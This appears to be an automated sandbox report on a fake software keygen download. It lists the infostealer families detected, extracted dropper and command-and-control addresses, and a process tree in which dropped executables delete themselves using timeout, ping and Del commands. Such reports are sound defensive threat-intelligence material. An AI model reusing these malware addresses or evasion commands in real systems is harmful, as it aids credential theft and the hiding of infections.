Resubmissions
06-10-2022 21:06
221006-zxrwaaaga6 1013-04-2021 12:47
210413-myxlaxh4ta 1012-04-2021 13:54
210412-6sz4v79f2x 10Analysis
-
max time kernel
98s -
max time network
295s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
12-04-2021 13:54
Errors
Reason
Machine shutdown
General
-
Target
https://keygenit.com/d/3e16ccf432109nspn247.html
-
Sample
210412-6sz4v79f2x
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://labsclub.com/welcome
Extracted
Family
raccoon
Botnet
a6bfe7e504db71e25642b830fd9b2c4366cf882a
Attributes
-
url4cnc
https://telete.in/j90dadarobin
rc4.plain
rc4.plain
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
-
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Executes dropped EXE 27 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 16 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks for any installed AV software in registry 1 TTPs 53 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 5 IoCs
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 13 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Runs ping.exe 1 TTPs 6 IoCs
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 45 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 13 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/3e16ccf432109nspn247.html1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ff86f784f50,0x7ff86f784f60,0x7ff86f784f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1508 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1792 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2192 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4676 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5152 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5308 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5312 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5456 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5548 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5680 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5724 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5732 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5308 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings2⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff71675a890,0x7ff71675a8a0,0x7ff71675a8b03⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6156 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6168 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6200 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5812 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5784 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5776 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5748 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5740 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5824 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5868 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6564 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6552 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6840 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6980 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7104 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7224 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7136 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7508 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7756 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7904 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8056 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8052 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8300 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8428 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8556 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8688 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8820 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7692 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7632 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6972 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6852 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3660 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4104 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3724 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1656 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3984 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=772 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,4468870362960595549,4064281223646368522,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6888 /prefetch:82⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp2_R_wipe_clean_11_serial_key_gen.zip\R_wipe_clean_11_serial_key_gen.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_R_wipe_clean_11_serial_key_gen.zip\R_wipe_clean_11_serial_key_gen.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\71D5.tmp.exe"C:\Users\Admin\AppData\Roaming\71D5.tmp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\71D5.tmp.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
